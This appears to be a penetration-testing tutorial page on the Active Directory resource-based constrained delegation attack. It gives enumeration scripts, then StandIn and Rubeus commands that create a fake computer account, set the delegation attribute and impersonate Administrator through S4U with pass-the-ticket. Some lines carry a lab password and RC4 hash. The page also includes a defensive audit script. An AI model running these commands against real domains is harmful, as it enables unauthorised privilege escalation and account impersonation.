# Resource-based Constrained Delegation

## Resource-based Constrained Delegation

Microsoft, in an effort to give domain users more flexibility, allowed the owner of a resource to configure which accounts are trusted to delegate to it. This is done through the attribute *msDS-AllowedToActOnBehalfOfOtherIdentity*, which controls access to the target resource: if a resource such as a computer account has this attribute set, the accounts listed in it are allowed to act on behalf of that computer account. Modifying the attribute requires write permission over the object, which an ordinary account does not have by default. However, if a machine's SYSTEM account can be triggered to authenticate and that authentication is relayed to Active Directory, an account may obtain delegation rights over the machine and therefore be able to act as an elevated user.

## Detection

### Required

* WRITE privilege on a computer's AD object
* Compromised computer and its machine account hash, OR
* Ability to create a "fake" computer object in AD

> If you already have a compromised machine and its machine account hash/credential, you can skip the steps for creating a new machine.

### Checking `ms-ds-machineaccountquota`

Since the attack involves creating a new computer object in the domain, first check whether ordinary users are allowed to do so: by default, a domain member can add up to 10 computers to the domain. To check this, query the root domain object and look at the `ms-ds-machineaccountquota` property.

#### Using WMI

```powershell
Get-WmiObject -Namespace root\directory\ldap -Class ds_domain | select DS_ms_DS_MachineAccountQuota
```


### Detecting WRITE access

```powershell
# Collect every computer object's ACL once. Each check below looks for principals holding GenericAll,
# GenericWrite or WriteOwner on a computer: the write access needed to set msDS-AllowedToActOnBehalfOfOtherIdentity.
$computeracls = Get-DomainComputer | Select-Object -ExpandProperty dnshostname | Get-DomainObjectAcl; "Got computer ACLs"
$writeRights = { $_.ActiveDirectoryRights -Like '*GenericAll*' -or $_.ActiveDirectoryRights -Like '*GenericWrite*' -or $_.ActiveDirectoryRights -Like '*WriteOwner*' }

# User SIDs vs. computer ACLs
$usersid = Get-DomainUser | Select-Object -ExpandProperty objectsid; "Got user SIDs"; "Searching ACLs for users with write rights..."
foreach ($acl in $computeracls) { foreach ($sid in $usersid) { $acl | Where-Object { $_.SecurityIdentifier -eq $sid } | Where-Object $writeRights } }

# Group SIDs vs. computer ACLs (built-in privileged groups excluded; they are expected to hold these rights)
$groupsid = Get-DomainGroup | Where-Object { $_.SamAccountName -notin @('Domain Admins','Account Operators','Enterprise Admins','Administrators','DnsAdmins','Schema Admins','Key Admins','Enterprise Key Admins','Storage Replica Administrators') } | Select-Object -ExpandProperty objectsid; "Got group SIDs"; "Searching ACLs for groups with write rights..."
foreach ($acl in $computeracls) { foreach ($sid in $groupsid) { $acl | Where-Object { $_.SecurityIdentifier -eq $sid } | Where-Object $writeRights } }

# Computer SIDs vs. computer ACLs
$computersid = Get-DomainComputer | Select-Object -ExpandProperty objectsid; "Got computer SIDs"; "Searching ACLs for computers with write rights..."
foreach ($acl in $computeracls) { foreach ($sid in $computersid) { $acl | Where-Object { $_.SecurityIdentifier -eq $sid } | Where-Object $writeRights } }
```

## Exploiting

Use StandIn.exe to create the fake computer object and to add `msDS-AllowedToActOnBehalfOfOtherIdentity` to the target computer object.

{% embed url="https://github.com/FuzzySecurity/StandIn" %}

### Creating fake computer object

```powershell
StandIn.exe --computer [fake computer] --make
```

### Modifying Target Computer's AD Object

With write access to a machine object, this StandIn function adds the `msDS-AllowedToActOnBehalfOfOtherIdentity` property to the machine, which is required to perform a resource-based constrained delegation attack.

```powershell
$ServiceAccountSID = Get-DomainComputer [fake computer] -Properties objectsid | Select -Expand objectsid
StandIn.exe --computer [target machine] --sid $ServiceAccountSID
```

#### Verifying change

```powershell
StandIn.exe --delegation
```
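From the defender's side, the change made above is visible in the directory itself. The following audit script is an added example, not part of the original page or the StandIn project: it lists every computer whose `msDS-AllowedToActOnBehalfOfOtherIdentity` is populated and decodes the security descriptor into the principals trusted to act on its behalf. It assumes the RSAT ActiveDirectory module and a domain-joined session with read access; the function name `Get-RbcdTrustees` is my own.

```powershell
# Added audit example, not from the original page or the StandIn project.
# Assumes the RSAT ActiveDirectory module; Get-RbcdTrustees is a hypothetical name.
Import-Module ActiveDirectory

function Get-RbcdTrustees {
    param([string]$SearchBase = (Get-ADDomain).DistinguishedName)

    # Presence filter: only computers that have the RBCD attribute populated
    $computers = Get-ADComputer -SearchBase $SearchBase `
        -LDAPFilter '(msDS-AllowedToActOnBehalfOfOtherIdentity=*)' `
        -Properties msDS-AllowedToActOnBehalfOfOtherIdentity, whenChanged

    foreach ($c in $computers) {
        # The attribute is a security descriptor; the AD module normally returns it
        # as ActiveDirectorySecurity, but fall back to decoding the raw bytes.
        $sd = $c.'msDS-AllowedToActOnBehalfOfOtherIdentity'
        if ($sd -isnot [System.DirectoryServices.ActiveDirectorySecurity]) {
            $raw = [byte[]]$sd
            $sd = New-Object System.DirectoryServices.ActiveDirectorySecurity
            $sd.SetSecurityDescriptorBinaryForm($raw)
        }
        $rules = $sd.GetAccessRules($true, $false, [System.Security.Principal.SecurityIdentifier])
        foreach ($ace in $rules) {
            $sid = $ace.IdentityReference.Value
            # Resolve the trustee SID; an unresolvable SID or a freshly created
            # machine account are the signs a reviewer should look for.
            $trustee = Get-ADObject -Filter "objectSid -eq '$sid'" -Properties whenCreated -ErrorAction SilentlyContinue
            $name    = if ($trustee) { $trustee.Name } else { '<unresolved SID>' }
            $class   = if ($trustee) { $trustee.ObjectClass } else { $null }
            $created = if ($trustee) { $trustee.whenCreated } else { $null }
            [pscustomobject]@{
                Computer       = $c.Name
                ObjectChanged  = $c.whenChanged   # last change to the computer object, not only this attribute
                TrusteeSid     = $sid
                Trustee        = $name
                TrusteeClass   = $class
                TrusteeCreated = $created
                Rights         = $ace.ActiveDirectoryRights
            }
        }
    }
}

# Computers delegating to accounts created in the last 7 days, or to SIDs that no
# longer resolve, are the first entries to review.
Get-RbcdTrustees | Where-Object { $_.TrusteeCreated -gt (Get-Date).AddDays(-7) -or -not $_.TrusteeClass } |
    Format-Table -AutoSize
```

Run `Get-RbcdTrustees` without the filter to see every RBCD relationship in the domain and compare it against the delegation setups that are known to be intentional.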

### Getting the machine account hash

```powershell
Invoke-Rubeus -Command "hash /password:dZMRM5i0V5Bhdw1 /user:AttackObjStudent16$ /domain:it.gcb.local"
```

### Impersonation

```powershell
Invoke-Rubeus -Command "s4u /user:[fake computer]$ /rc4:[fake computer hash] /impersonateuser:[Impersonation user] /msdsspn:cifs/[target machine] /ptt"

# Invoke-Rubeus -Command 's4u /user:IT-Employee16$ /rc4:f2870d37a6ead900448faae043f13a5c /impersonateuser:Administrator /msdsspn:host/it-track01 /altservice:cifs /domain:it.gcb.local /nowrap /ptt'
```

## References

{% embed url="https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution" %}

{% embed url="https://pentestlab.blog/2021/10/18/resource-based-constrained-delegation" %}

